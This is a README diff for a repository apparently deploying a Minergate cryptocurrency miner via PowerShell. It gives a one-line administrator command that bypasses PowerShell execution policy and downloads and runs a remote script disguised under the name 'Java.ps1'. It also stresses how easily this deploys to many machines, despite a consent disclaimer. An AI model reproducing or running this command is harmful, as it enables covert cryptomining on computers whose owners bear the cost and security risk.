R0ckNRolla/Minergate-Powershell/README.md

 Please do NOT use this without the consent of the person who owns the computer.
 This code is NOT to be used for malicious purposes.

-### Example (Works in Win 10 Only)
+### Final Example (Works in Win 10 Only)

-This executes a the code in this git via one line of code only.
+With some work you can executes the code in this git via one line of code only.
 It makes it extremely easy to deploy to lots of machines.
 I will publish the guide on how to do this soon.

 Run CMD as Administrator and paste this script in:

 @powershell -NoProfile -ExecutionPolicy Bypass -Command "iex ((new-object net.webclient).DownloadString('https://gist.githubusercontent.com/Hawkryption/dd55e0a282a70f3af63ed792f5eca570/raw/aec24c2aca6d41f521d0dc90cd6749a4c553e613/Java.ps1'))"

 ### Using this Powershell Script